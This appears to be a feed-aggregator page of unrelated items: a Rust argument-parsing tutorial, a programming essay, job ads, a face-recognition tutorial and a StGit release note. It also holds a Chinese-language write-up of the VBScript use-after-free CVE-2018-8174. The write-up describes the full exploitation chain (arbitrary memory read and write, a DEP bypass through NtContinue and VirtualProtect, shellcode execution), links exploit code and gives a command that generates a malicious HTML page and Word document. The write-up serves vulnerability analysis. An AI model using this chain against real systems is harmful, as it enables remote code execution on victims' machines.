To start off, we’re going to define some helper functions to:

  • Require another argument
  • Require that there are no more arguments
  • Parse a u32

All of these need to return Result values, and we’ll use a ParseError for the error case in all of them. The first two functions need to take a mutable reference to our arguments. (As a side note, I’m going to stop using the skip method now, because if I do it will give away the solution to exercise 1.)

use std::env::Args;

fn require_arg(args: &mut Args) -> Result<String, ParseError> {
    match args.next() {
        None => Err(ParseError::TooFewArgs),
        Some(s) => Ok(s),
    }
}

fn require_no_args(args: &mut Args) -> Result<(), ParseError> {
    match args.next() {
        Some(_) => Err(ParseError::TooManyArgs),
        // I think this looks a little weird myself.
        // But we're wrapping up the unit value ()
        // with the Ok variant. You get used to it
        // after a while, I guess
        None => Ok(()),
    }
}

fn parse_u32(s: String) -> Result<u32, ParseError> {
    match s.parse() {
        Err(_) => Err(ParseError::InvalidInteger(s)),
        Ok(x) => Ok(x),
    }
}

Now that we have these helpers defined, our parse_args function is much easier to look at:

fn parse_args() -> Result<Frame, ParseError> {
    let mut args = std::env::args();

    // skip the command name
    let _command_name = require_arg(&mut args)?;

    let width_str = require_arg(&mut args)?;
    let height_str = require_arg(&mut args)?;
    require_no_args(&mut args)?;
    let width = parse_u32(width_str)?;
    let height = parse_u32(height_str)?;

    Ok(Frame { width, height })
}

Beautiful!

Forgotten question marks

What do you think happens if you forget the question mark on the let width_str line? If you do so:

  • width_str will contain a Result<String, ParseError> instead of a String
  • The call to parse_u32 will not type check
error[E0308]: mismatched types
  --> src/main.rs:50:27
   |
50 |     let width = parse_u32(width_str)?;
   |                           ^^^^^^^^^ expected struct `std::string::String`, found enum `std::result::Result`
   |
   = note: expected type `std::string::String`
              found type `std::result::Result<std::string::String, ParseError>`

That’s nice. But what will happen if we forget the question mark on the require_no_args call? We never use the output value there, so it will type check just fine. Now we have the age old problem of C: we’re accidentally ignoring error codes!

Well, not so fast. Check out this wonderful warning from the compiler:

warning: unused `std::result::Result` which must be used
  --> src/main.rs:49:5
   |
49 |     require_no_args(&mut args);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^
   |
   = note: #[warn(unused_must_use)] on by default
   = note: this `Result` may be an `Err` variant, which should be handled

That’s right: Rust will detect if you’ve ignored a potential failure. There is a hole in this in the current code sample:

let _command_name = require_arg(&mut args);

That doesn’t trigger the warning, since in let _name = blah;, the leading underscore says “I know what I’m doing, I don’t care about this value.” Instead, it’s better to write the code without the let:

require_arg(&mut args);

Now we get a warning, which can be solved with the added trailing question mark.

Exercise 3

It would be more convenient to use method call syntax. Let’s define a helper data type to make this possible. Fill in the implementation of the code below.

#[derive(Debug)]
struct Frame {
    width: u32,
    height: u32,
}

#[derive(Debug)]
enum ParseError {
    TooFewArgs,
    TooManyArgs,
    InvalidInteger(String),
}

struct ParseArgs(std::env::Args);

impl ParseArgs {
    fn new() -> ParseArgs {
        unimplemented!()
    }


    fn require_arg(&mut self) -> Result<String, ParseError> {
        match self.0.next() {
        }
    }
}

fn parse_args() -> Result<Frame, ParseError> {
    let mut args = ParseArgs::new();

    // skip the command name
    args.require_arg()?;

    let width_str = args.require_arg()?;
    let height_str = args.require_arg()?;
    args.require_no_args()?;
    let width = parse_u32(width_str)?;
    let height = parse_u32(height_str)?;

    Ok(Frame { width, height })
}

fn main() {
    println!("{:?}", parse_args());
}

Updating bouncy

This next bit should be done as a Cargo project, not with rustc. Let’s start a new empty project:

$ cargo new bouncy-args --bin
$ cd bouncy-args

Next, let’s get the old code and place it in src/main.rs. You can copy-paste manually, or run:

$ curl https://gist.githubusercontent.com/snoyberg/5307d493750d7b48c1c5281961bc31d0/raw/8f467e87f69a197095bda096cbbb71d8d813b1d7/main.rs > src/main.rs

Run cargo run and make sure it works. You can use Ctrl-C to kill the program.

We already wrote fully usable argument parsing code above. Instead of putting it in the same source file, let’s put it in its own file. In order to do so, we’re going to have to play with modules in Rust.

For convenience, you can view the full source code as a Gist. We need to put this in src/parse_args.rs:

$ curl https://gist.githubusercontent.com/snoyberg/568899dc3ae6c82e54809efe283e4473/raw/2ee261684f81745b21e571360b1c5f5d77b78fce/parse_args.rs > src/parse_args.rs

If you run cargo build now, it won’t even look at parse_args.rs. Don’t believe me? Add some invalid content to the top of that file and run cargo build again. Nothing happens, right? We need to tell the compiler that we’ve got another module in our project. We do that by modifying src/main.rs. Add the following line to the top of your file:

mod parse_args;

If you put in that invalid line before, running cargo build should now result in an error message. Perfect! Go ahead and get rid of that invalid line and make sure everything compiles and runs. We won’t be accepting command line arguments yet, but we’re getting closer.

Use it!

We’re currently getting some dead code warnings, since we aren’t using anything from the new module:

warning: struct is never constructed: `Frame`
 --> src/parse_args.rs:2:1
  |
2 | struct Frame {
  | ^^^^^^^^^^^^
  |
  = note: #[warn(dead_code)] on by default

warning: enum is never used: `ParseError`
 --> src/parse_args.rs:8:1
  |
8 | enum ParseError {
  | ^^^^^^^^^^^^^^^

warning: function is never used: `parse_args`
  --> src/parse_args.rs:14:1
   |
14 | fn parse_args() -> Result<Frame, ParseError> {
   | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Let’s fix that. To start off, add the following to the top of your main module, just to prove that we can, in fact, use our new module:

println!("{:?}", parse_args::parse_args());
return; // don't start the game, our output will disappear

Also, add a pub in front of the items we want to access from the main.rs file, namely:

  • struct Frame
  • enum ParseError
  • fn parse_args

Running this gets us:

$ cargo run
   Compiling bouncy-args v0.1.0 (/Users/michael/Desktop/tmp/bouncy-args)
warning: unreachable statement
   --> src/main.rs:115:5
    |
115 |     let mut game = Game::new();
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^
    |
    = note: #[warn(unreachable_code)] on by default

warning: variable does not need to be mutable
   --> src/main.rs:115:9
    |
115 |     let mut game = Game::new();
    |         ----^^^^
    |         |
    |         help: remove this `mut`
    |
    = note: #[warn(unused_mut)] on by default

    Finished dev [unoptimized + debuginfo] target(s) in 0.67s
     Running `target/debug/bouncy-args`
Err(TooFewArgs)

It’s nice that we get an unreachable statement warning. It’s also a bit weird that game is no longer required to be mutable. Strange. But most importantly: our argument aprsing is working!

Let’s try to use this. We’ll modify the Game::new() method to accept a Frame as input:

impl Game {
    fn new(frame: Frame) -> Game {
        let ball = Ball {
            x: 2,
            y: 4,
            vert_dir: VertDir::Up,
            horiz_dir: HorizDir::Left,
        };
        Game {frame, ball}
    }

    ...
}

And now we can rewrite our main function as:

fn main () {
    match parse_args::parse_args() {
        Err(e) => {
            // prints to stderr instead of stdout
            eprintln!("Error parsing args: {:?}", e);
        },
        Ok(frame) => {
            let mut game = Game::new(frame);
            let sleep_duration = std::time::Duration::from_millis(33);
            loop {
                println!("{}", game);
                game.step();
                std::thread::sleep(sleep_duration);
            }
        }
    }
}

Mismatched types

We’re good, right? Not quite:

error[E0308]: mismatched types
   --> src/main.rs:114:38
    |
114 |             let mut game = Game::new(frame);
    |                                      ^^^^^ expected struct `Frame`, found struct `parse_args::Frame`
    |
    = note: expected type `Frame`
               found type `parse_args::Frame`

We now have two different definitions of Frame: in our parse_args module, and in main.rs. Let’s fix that. First, delete the Frame declaration in main.rs. Then add the following after our mod parse_args; statement:

use self::parse_args::Frame;

self says we’re finding a module that’s a child of the current module.

Public and private

Now everything will work, right? Wrong again! cargo build will vomit a bunch of these errors:

error[E0616]: field `height` of struct `parse_args::Frame` is private
  --> src/main.rs:85:23
   |
85 |         for row in 0..self.frame.height {
   |

By default, identifiers are private in Rust. In order to expose them from one module to another, you need to add the pub keyword. For example:

pub width: u32,

Go ahead and add pub as needed. Finally, if you run cargo run, you should see Error parsing args: TooFewArgs. And if you run cargo run 5 5, you should see a much smaller frame than before. Hurrah!

Exercise 4

What happens if you run cargo run 0 0? How about cargo run 1 1? Put in some better error handling in parse_args.

Exit code

Alright, one final irritation. Let’s provide some invalid arguments and inspect the exit code of the process:

$ cargo run 5
Error parsing args: TooFewArgs
$ echo $?
0

For those not familiar: a 0 exit code means everything went OK. That’s clearly not the case here! If we search the standard library, it seems the std::process::exit can be used to address this. Go ahead and try using that to solve the problem here.

However, we’ve got one more option: we can return a Result straight from main!

fn main () -> Result<(), self::parse_args::ParseError> {
    match parse_args::parse_args() {
        Err(e) => {
            return Err(e);
        },
        Ok(frame) => {
            let mut game = Game::new(frame);
            let sleep_duration = std::time::Duration::from_millis(33);
            loop {
                println!("{}", game);
                game.step();
                std::thread::sleep(sleep_duration);
            }
        }
    }
}

Exercise 5 Can you do something to clean up the nesting a bit here?

Better error handling

The error handling problem we had in the last lesson involved the call to top_bottom. I’ve already included a solution to that in the download of the code provided. Guess what I changed since last time and then check the code to confirm that you’re right.

If you’re following very closely, you may be surprised that there aren’t more warnings about unused Result values coming from other calls to write!. As far as I can tell, this is in fact a bug in the Rust compiler.

Still, it would be good practice to fix up those calls to write!. Take a stab at doing so.

Next time

We still didn’t fix our double buffering problem, we’ll get to that next time. We’re also going to introduce some more error handling from the standard library. And maybe we’ll get to play a bit more with iterators as well.

Rust at FP Complete | Introduction


          Matt Parsons: Capability and Suitability      Cache   Translate Page      

Gary Bernhardt has a fantastic talk on Capability vs Suitability, where he separates advances in software engineering into two buckets:

  • Capability: The ability to do new things!
  • Suitability: The ability to do things well.

Capability is progressive and daring, while suitability is conservative and boring. Capability wants to create entirely new things, while suitability wants to refine existing things.

This post is going to explore a metaphor with bicycles, specifically bike tires, while we think about capability and suitability. When you get a bike, you have so many options. Tire size is one of them. You can opt for a super narrow road tire – a mere 19mm in width! Or, on the other end of the scale, you can opt for a truly fat tire at around 5” in width. What’s the difference?

Narrower tires are less capable – there is less terrain you can cover on a narrow tire. However, they’re more suitable for the terrain they can cover – a 19mm tire will be significantly lighter and faster thana 5” tire. A good 19mm tire weighs around 200g, while a 5” tire might weigh 1,800g each. Lugging around an extra 7lbs of rubber takes a lot of energy! Additionally, all that rubber is going to have a lot of rolling resistance – it’ll be harder to push across the ground on smooth surfaces where the 19mm tire excels.

So, most cyclists don’t use fat tire bikes. But they also don’t use 19mm skinny tires. Most road cyclists have moved up to 25 or 28mm tires. While the 19mm tires work fantastically on a perfectly smooth surface, they start suffering when the road gets bumpy. All the bumps and rough surfaces call for a slightly more capable tire. The wider tires can run lower air pressure, which lets them float over bumps rather than being bumped up and down.

So, we have two competing forces in bike tires:

  • The speed and comfort on the terrain you ride most frequently
  • The speed and comfort on the worst terrain you encounter regularly

You want enough capability to handle the latter, while a tire that’s suitable for the former.

In computer programming, we tend to reach for the most capable thing we can get our hands on. Dynamically typed, impure, and Turing complete programming languages like Ruby, JavaScript, and Python are immensely popular. Statically typed languages are often seen as stifling, and pure languages even more so. There simply aren’t many languages that are Turing incomplete, that’s how little we like them!

Yet, these extra gains in capability are often unnecessary. There’s very little code that’s difficult to statically type with a reasonable type system. Impurity seems convenient, until you realize that you need to look at every single method call to see why the code that renders an HTML page is making an N+1 query and ruining performance. Indeed, even Turing completeness is overrated – a Turing incomplete language permits dramatically more optimizations and static analysis for bug prevention, and very few programs actually require Turing completeness.

In this sense, programmers are like cyclists that pick up the 5” tire fat bikes and then wonder why they’re moving so slow. They may ride in the snow or deep sand once or twice a year, and they stick with the 5” tire for that reason alone. Programmers that are willing to give up the capability they don’t need in order to purchase suitability they could use tend to go faster, as you might expect. Folks that learn Haskell and become sufficiently familiar with purely functional and statically typed programming tend to take those practices with them, even in impure or dynamically typed languages.

It is easier to understand what you did when you limit what you can do.


          Python version to a file      Cache   Translate Page      
$ echo "$(python -V 2>&1)" > file
This command sent the Python version to a file. This is intended to be used in scripts. For some reason, simple redirections didn't work with "python -V"

commandlinefu.com

Diff your entire server config at ScriptRock.com


          Windows VBScript引擎远程执行代码漏洞 CVE-2018-8174分析与利用      Cache   Translate Page      
漏洞简介 VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后攻击者可以安装程序; 查看,更改或删除数据; 或创建具有完全用户权限的新帐户。 在基于Web的攻击情形中,攻击者能通过Internet Explorer利用此漏洞的特定网站,然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。 2018年5月8日,微软发布了安全补丁,影响流行的大部分系统版本。 漏洞基本信息 漏洞ID CVE-2018-8174 漏洞名称 Microsoft VBScript引擎远程执行代码漏洞 漏洞类型 远程代码执行 威胁类型 UAF 影响系统版本 Windows 7 x86和x64版本、RT8.1、Server2008及R2/2012及R2/2016、8.1、10及服务器等版本 漏洞测试 系统环境 Win7 32 IE IE8 EXP https://www.exploit-db.com/exploits/44741/ 漏洞原理 由于样本混淆严重,部分代码见图1,这里采用简化POC进行分析,代码见图2。  图1 样本采用了严重混淆  图2 Crash Poc Crash Poc中定义两个数组array_a和array_b,并声明了一个类MyTest,且重载了析构函数Class_Terminate,UAF中创建MyTest的实例赋值给数组array_a(1),并通过Erase array_a清空array_a中的元素,在析构array_a中的元素的时候会触发脚本中Class_Terminate的调用,在Class_Terminate中增加了一个array_b(0)对MyTest实例的引用(MyTest实例引用计数+1),再通过array_a (1)= 1删除array_a (1) 对MyTest实例的引用(MyTest实例引用计数-1)来平衡引用计数,这时候MyTest实例会被释放,但是array_b(0)仍然保留了这个MyTest实例的引用,从而array_b(0)指向了被释放的MyTest实例的内存,最终在MyTestVuln中通过b(0) = 0访问未分配内存触发漏洞。 当我们启用了页堆的IE浏览器运行这个PoC时,我们可以观察到OLEAUT32!VariantClear函数会发生崩溃:调用被释放的内存时出现访问冲突(Access Violation)异常。 从堆信息中可以看到eax(0x14032fd0)在vbscript!VbsErase的调用栈中被释放了,vbscript!VbsErase即对应了脚本中的Erase,而eax正是被VBScriptClass::Release函数释放的VBScriptClass对象也就是脚本中的MyTest实例。VBScriptClass::Release的逻辑如下图:     VBScriptClass::Release中首先对VBScriptClass的引用计数-1(&VBScriptClass+0×4),如果引用计数=0则调用VBScriptClass::TerminateClass,调用VBScriptClass::TerminateClass时因为在脚本中重载了Class_Terminate函数,所以获得了一次脚本执行的机会,这里就可以在释放VBScriptClass的内存前将即将释放的VBScriptClass内存地址保存脚本控制的变量中(Set array_b(0)=array_a(1)),并通过array_a (1) = 1平衡引用计数,最终释放内存。 Set array_a(1) = New MyTest时,VBScriptClass引用计数为2。 Erase array_a 返回后,MyTest指向的内存已释放,但array_b(0)仍指向这块被释放的内存,形成了悬挂指针,见下图: 漏洞利用分析 UAF漏洞利用的关键是如何用这个悬挂指针来操作内存。该漏洞利用多次UAF来完成类型混淆,通过伪造精数组对象完成任意地址读写,最终通过构造对象后释放来获取代码执行,代码执行没有使用传统的ROP技术或GodMod技术,而是通过脚本布局Shellcode利用。 伪造数组达到任意写目的 通过UAF制造2个类的mem成员指向的偏移相差0x0c字节,通过对2个对象mem成员读的写操作伪造一个0x7fffffff大小的数组。 伪造的数组大致情况是:一维数组,元素有7fffffff个,每个元素占用1字节,元素内存地址为0。所以该数组可访问的内存空间为0×00000000到0x7ffffffff*1。因此通过该数组可以任意地址读写。但是在lIlIIl在存放的时候,存放的类型是string类型,故只需要将该数据类型将会被修改为0x200C,即VT_VARIANT|VT_ARRAY,数组类型,即可达到目的。 攻击代码中,主要使用上面的函数来读取参数所指定的内存地址的数据。利用思路是在VBS中数据类型为bstr类型,通过vb中lenb(bstrxx)返回字符串地址前4个字节的内容(即bstr类型size域内容)的特性,获取指定内存读能力。 如上述代码所示,假如传进来的参数为addr(0×11223344),首先该数值加4,为0×11223348,然后设置variant类型为8(string类型)。然后调用len函数,发现是BSTR类型,vbscript会认为其向前4字节即0×11223344就是存放长度的地址内存。因此执行len函数,实际上就返回了制定参数内存地址的值。 通过DOSmodeSearch获取。 通过泄露CScriptEntryPoint对象的虚函数表地址,该地址属于Vbscript.dll。 由于vbscript.dll导入了msvcrt.dll,因此通过遍历vbscript.dll导入表获取msvcrt.dll基地址, msvcrt.dll又引入了kernelbase.dll、ntdll.dll,最后可以获取NtContinue、VirtualProtect函数地址。 绕过DEP执行shellcode a.利用任意读写的手段修改某个VAR的type类型为0x4d,再赋值为0让虚拟机执行VAR::Clear函数,如下图显示。 b.通过精心控制使代码执行ntdll!ZwContinue函数,第一次参数CONTEXT结构体也是攻击者精心构造的,见下图。 c.ZwContinue的第一个参数是指向CONTEXT结构体的指针,可计算出EIP和ESP在CONTEXT中的偏移。 d.实际运行时CONTEXT中的Eip和Esp的值以及攻击者的方法,见下图。  攻击者将CONTEXT中的EIP设置为VirutalProtect,将ESP中的返回地址和VirtualProtect的第一个参数,都设置为shellcode的起始地址。当ZwContinue执行后直接跳到VirtualProtect第一条指令开始执行。  根据攻击者构造的参数将shellcode所在内存设置为可执行状态,当VirtualProtect返回时就会跳到shellcode执行。 最后调用WinExec弹出计算器。 MSF利用 环境准备 目标机 Win7以及安装具有该漏洞的office 攻击机 Kali  linux Msf组件 https://github.com/Sch01ar/CVE-2018-8174_EXP 生成带有恶意 VBscript 的html 页面和 word 文档 python CVE-2018-8174.py -uhttp://192.168.106.139/exploit.html […]
          Analista Desenvolvedor PYTHON Pleno – 1 Vaga – Rio de Janeiro – RJ      Cache   Translate Page      
Vagas em: 1 vaga – Rio de Janeiro – RJ (1) Para ver detalhes da vaga e se candidatar clique aqui. Se não conseguir acessar, copie e cole esta URL no seu navegador: https://emprego.net/jobs/5bd74cb3108a987e0cc1824b emprego.net – onde candidatos e Leia mais...
          Python Developer - Sport's Betting Company      Cache   Translate Page      
Understanding Recruitment - The City, London - Python Developer - Sport's Betting Company Hammersmith, London - £70,000 - £80,000 We're hiring for a Python Developer for a Sport...'s betting tech company. As the Python Developer you will be working with a diverse team of developers and analysts. The task of the Python...
          Stegano 0.8.6      Cache   Translate Page      
Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.
          python or C++ Expert that knows MINIZINC      Cache   Translate Page      
I need a help with a little project. Modeling the following problem and then programming in MiniZinc: More details will be shared via chat (Budget: $10 - $30 CAD, Jobs: C Programming, Data Analytics, Data Entry, Mathematics, Python)
          Senior Python (Django) Developer      Cache   Translate Page      
NY-Manhattan, Harvey Nash, Inc. ($950M+ company - www.harveynash.com) is a global IT Recruitment, Outsourcing, Offshoring company founded in 1988 with more than 40 offices covering the USA (7 offices), Europe, Australia and Singapore. Publicly-traded in London stock exchange - LON: HVN. Our direct client located in New York City is looking to hire a Python (Django) Developer. We invite you to review the positio
          Lập Trình Viên ERP (Senior)      Cache   Translate Page      
Tp Hồ Chí Minh - nhập bằng: Lập Trình Viên ERP (Senior) CÔNG TY CỔ PHẦN HHD GROUP Ngày cập nhật: 06/11/2018 Thông Tin Tuyển Dụng Nơi làm việc: Cấp... -Thành thạo một trong các ngôn ngữ lập trình sau đây: Python Java C #. NET ASP.NET PHP - Cơ sở dữ liệu: Có kinh nghiệm ít nhất một DBMS...
          imgp - multi-core batch image file resize and rotate      Cache   Translate Page      

imgp is a Python-based command-line tool that lets you resize and rotate JPEG and PNG files.


          Python Developer      Cache   Translate Page      
TX-Austin, Our well established client is seeking an ambitious and experienced Python Developer to join their dedicated team in Austin. This position has a great benefit package that includes Medical, Dental and Vision benefits, 401k with company matching, and life insurance for those who qualify. Responsibilities of the Python Developer: Review SOW use cases, specifications, and requirements to develop a cl
          Python / Django Lead Web Developer - Avenza Systems Inc. - Toronto, ON      Cache   Translate Page      
The app is used daily by tens of thousands of users all over the world, including pilots, forest rangers, firefighters, military personnel, hikers and more, to...
From Avenza Systems Inc. - Tue, 30 Oct 2018 10:39:40 GMT - View all Toronto, ON jobs
          Python Developer - Hitachi ID Systems - Montréal, QC      Cache   Translate Page      
Translate business process definitions into Python components, built using a well defined framework and shipped with our IAM products....
From Hitachi ID Systems - Thu, 01 Nov 2018 10:20:39 GMT - View all Montréal, QC jobs
          Python Developer      Cache   Translate Page      
TX-Austin, Our well established client is seeking an ambitious and experienced Python Developer to join their dedicated team in Austin. This position has a great benefit package that includes Medical, Dental and Vision benefits, 401k with company matching, and life insurance for those who qualify. Responsibilities of the Python Developer: Review SOW use cases, specifications, and requirements to develop a cl
          Thomas Kölpin, Biologe      Cache   Translate Page      
Er kommt aus Hamburg, studierte erst Psychologie, dann Biologie und wurde ein international anerkannter Reptilienexperte, der auch privat Pythonschlangen hält. Seit viereinhalb Jahren ist Thomas Kölpin Direktor der Stuttgarter Wilhelma, einem der größten Tierparks in Stuttgart und steht vor der großen Aufgabe, Zukunft zu organisieren, die Lebensbedingungen der Tiere zu verbessern, den Artenschutz zu stärken und das in Zeiten, in denen auch die Frage nach der Sinnhaftigkeit zoologischer Einrichtungen gestellt wird.
          Adjunct Instructor - Computer Science - Casper College - Casper, WY      Cache   Translate Page      
Teach courses at the freshman and sophomore level, including C++ and Visual Basic, Python, and Java Teaching. The Adjunct Computer Science Instructor teaches a...
From Casper College - Fri, 26 Oct 2018 19:05:54 GMT - View all Casper, WY jobs
          Data Analyst Python SQL Mathematics      Cache   Translate Page      
Data Team - West London - Data Analyst London to £70k Data Analyst / Reporting Engineer (Python SQL). Are you a skilled Data Analyst with Python programming skills... offices in a vibrant area of London? Collaborating with Data Scientists you will design, maintain and manage the evolutio......
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experience with software installation and maintenance, specifically...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Jr. Java Developer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python. A successful Junior Java Developer will:. Have 3+ years of professional enterprise development experience. Sling TV L.L.C....
From DISH - Wed, 19 Sep 2018 16:13:34 GMT - View all Cheyenne, WY jobs
          API Test Automation Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python, JavaScript, Type Script. Have 3+ years of professional enterprise development / testing experience. Sling TV L.L.C....
From DISH - Fri, 14 Sep 2018 17:19:08 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
4 or more years of experience in programming and software development with Python, Perl, Java, and/or other industry standard language....
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Software Developer - Matric - Morgantown, WV      Cache   Translate Page      
Application development with Java, Python, Scala. Enterprise level web applications. MATRIC is a strategic innovation partner providing deep, uncommon expertise...
From MATRIC - Tue, 11 Sep 2018 00:02:33 GMT - View all Morgantown, WV jobs
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
| Mercury, Segue, Borland. This specialization is usually performed by senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          Démarreurs à distance/Remote Starters Installation Tech - Directed - Montréal, QC      Cache   Translate Page      
Offer Red line support for Directed Tech Support teams in Vista (U.S.). DIRECTED est un leader mondial de la sécurité automobile (Viper®, Clifford®, Python® et...
From Directed - Tue, 30 Oct 2018 17:33:25 GMT - View all Montréal, QC jobs
          Technicien en installation Démarreurs à distance - Remote Starters - Directed - Montréal, QC      Cache   Translate Page      
Offer Red line support for Directed Tech Support teams in Vista (U.S.). Est un leader mondial de la sécurité automobile (Viper®, Clifford®, Python® et Autostart...
From Indeed - Tue, 30 Oct 2018 15:45:50 GMT - View all Montréal, QC jobs
          #3: Python for Everybody: Exploring Data in Python 3      Cache   Translate Page      
Python for Everybody
Python for Everybody: Exploring Data in Python 3
Charles Severance , Aimee Andrion , Elliott Hauser , Sue Blumenberg
(7)

Buy new: CDN$ 1.29

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
          #7: Python Pocket Reference: Python In Your Pocket      Cache   Translate Page      
Python Pocket Reference
Python Pocket Reference: Python In Your Pocket
Mark Lutz
(8)

Buy new: CDN$ 19.39 CDN$ 19.31
43 used & new from CDN$ 11.34

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
          #9: Python for Kids: A Playful Introduction To Programming      Cache   Translate Page      
Python for Kids
Python for Kids: A Playful Introduction To Programming
Jason R. Briggs
(5)

Buy new: CDN$ 36.95 CDN$ 36.58
46 used & new from CDN$ 8.82

(Visit the Bestsellers in Languages & Tools list for authoritative information on this product's current rank.)
           Comment on “Sarkar”… An efficient political platform that should have been a more effective movie by Monty Python       Cache   Translate Page      
Varungaala Google CEO Thalapathy Vijay Vaazhga! Let me be the first to propose Thalapathy for this and would urge the board of directors to consider appointing Vijay for this position. Considering political ambitions of Vijay (et.al. of course), and the art of trivialization which these people have mastered along with the art of acting, I do not think this to be a long shot. In fact, Google manages far fewer employees than TN government. And Google CEO is expected to enjoy with babes in Las Vegas, deliver punch dialogues, etc. "Farce" would be an understatement for movies like this and the support it gets from the so called fans.
          Do annotation for my dataset      Cache   Translate Page      
I would like to hire a freelancer to do annotations to my image dataset (total number of images is less than 100) using VIA 1.0 (Budget: ₹600 - ₹1500 INR, Jobs: Algorithm, Artificial Intelligence, C Programming, Machine Learning, Python)
          用Python实现一个简单的人脸识别,原来我和这个明星如此相似      Cache   Translate Page      

近几年来,兴起了一股人工智能热潮,让人们见到了AI的能力和强大,比如图像识别,语音识别,机器翻译,无人驾驶等等。总体来说,AI的门槛还是比较高,不仅要学会使用框架实现,更重要的是,需要有一定的数学基础,如线性代数,矩阵,微积分等。

幸庆的是,国内外许多大神都已经给我们造好“轮子”,我们可以直接来使用某些模型。今天就和大家交流下如何实现一个简易版的人脸对比,非常有趣!

整体思路: 预先导入所需要的人脸识别模型 遍历循环识别文件夹里面的图片,让模型“记住”人物的样子 输入一张新的图像,与前一步文件夹里面的图片比对,返回最接近的结果 使用到的第三方模块和模型:

模块:os,dlib,glob,numpy

模型:人脸关键点检测器,人脸识别模型

1.导入需要的模块和模型
用Python实现一个简单的人脸识别,原来我和这个明星如此相似
这里解释一下两个dat文件:

它们的本质是参数值(即神经网络的权重)。 人脸识别算是深度学习的一个应用,事先需要经过大量的人脸图像来训练 。所以一开始我们需要去设计一个神经网络结构,来“记住”人类的脸。

对于神经网络来说,即便是同样的结构,不同的参数也会导致识别的东西不一样。在这里,这两个参数文件就对应了不同的功能(它们对应的神经网络结构也不同):

shape_predictor.dat这个是为了检测人脸的关键点,比如眼睛,嘴巴等等;dlib_face_recognition.dat是在前面检测关键点的基础上,生成人脸的特征值。

所以后面使用 dlib模块的时候 ,其实就是相当于,调用了某个神经网络结构,再把预先训练好的参数传给我们调用的神经网络。顺便提一下,在深度学习领域中,往往动不动会训练出一个上百M的参数模型出来,是很正常的事。

2.对训练集进行识别

在这一步中,我们要完成的是,对图片文件夹里面的人物图像, 计算他们的人脸特征,并放到一个列表里面 ,为了后面可以和新的图像进行一个距离计算。关键地方会加上注释,应该不难理解,具体实现为:


用Python实现一个简单的人脸识别,原来我和这个明星如此相似

当你做完这一步之后,输出列表descriptors看一下,可以看到类似这样的数组,每一个数组代表的就是每一张图片的特征量(128维)。然后我们可以使用L2范式(欧式距离),来计算两者间的距离。

举个例子,比如经过计算后,A的特征值是[x1,x2,x3],B的特征值是[y1,y2,y3], C的特征值是[z1,z2,z3],
用Python实现一个简单的人脸识别,原来我和这个明星如此相似

那么由于A和B更接近,所以会认为A和B更像。想象一下极端情况,如果是同一个人的两张不同照片,那么它们的特征值是不是应该会几乎接近呢?知道了这一点,就可以继续往下走了。


用Python实现一个简单的人脸识别,原来我和这个明星如此相似
3.处理待对比的图片

其实是同样的道理,如法炮制, 目的就是算出一个特征值出来,所以和第二步差不多。然后再顺便计算出新图片和第二步中每一张图片的距离 ,再合成一个字典类型,排个序,选出最小值,搞定收工!


用Python实现一个简单的人脸识别,原来我和这个明星如此相似
4.运行看一下

这里我用了一张“断水流大师兄”林国斌的照片,识别的结果是,果然,是最接近黎明了(嘻嘻,我爱黎明)。但如果你事先在训练图像集里面有放入林国斌的照片,那么出来的结果就是林国斌了。


用Python实现一个简单的人脸识别,原来我和这个明星如此相似

为什么是黎明呢?我们看一下输入图片里的人物最后与每个明星的距离,输出打印一下:


用Python实现一个简单的人脸识别,原来我和这个明星如此相似

没错,他和黎明的距离是最小的,所以和他也最像了!


          [ANNOUNCE] StGit 0.19      Cache   Translate Page      
I am pleased to announce the release of Stacked Git 0.19.

The big feature for this release is Python 3 support, but 0.19 also
contains some important bug fixes and more robust test infrastructure.

The full release notes follow.

Cheers,
Pete

----%<----

Stacked Git 0.19 released
-------------------------

StGit is a Python application providing functionality similar to Quilt
(i.e. pushing/popping patches to/from a stack) on top of Git. These
operations are performed using Git commands, and the patches are stored
as Git commit objects, allowing easy merging of the StGit patches into
other repositories using standard Git functionality.

Download: https://github.com/ctmarinas/stgit/archive/v0.19.tar.gz
Main repository: https://github.com/ctmarinas/stgit
Project homepage: http://www.procode.org/stgit/
Issue tracker: https://github.com/ctmarinas/stgit/issues

The main changes since release 0.18:

- Python 3 support. StGit supports Python 2.6, 2.7, 3.3, 3.4, 3.5, 3.6,
and 3.7. PyPy interpreters are also supported.

- Submodules are now ignored when checking if working tree is clean.
Submodules are also not included by default when refreshing a patch.

- Config booleans are now parsed similarly to git-config.

- contrib/stgit.el is now licenced with GPLv2.

- Repair handling of emails with utf-8 bodies containing latin-1
characters. Also correctly decode email headers containing quoted
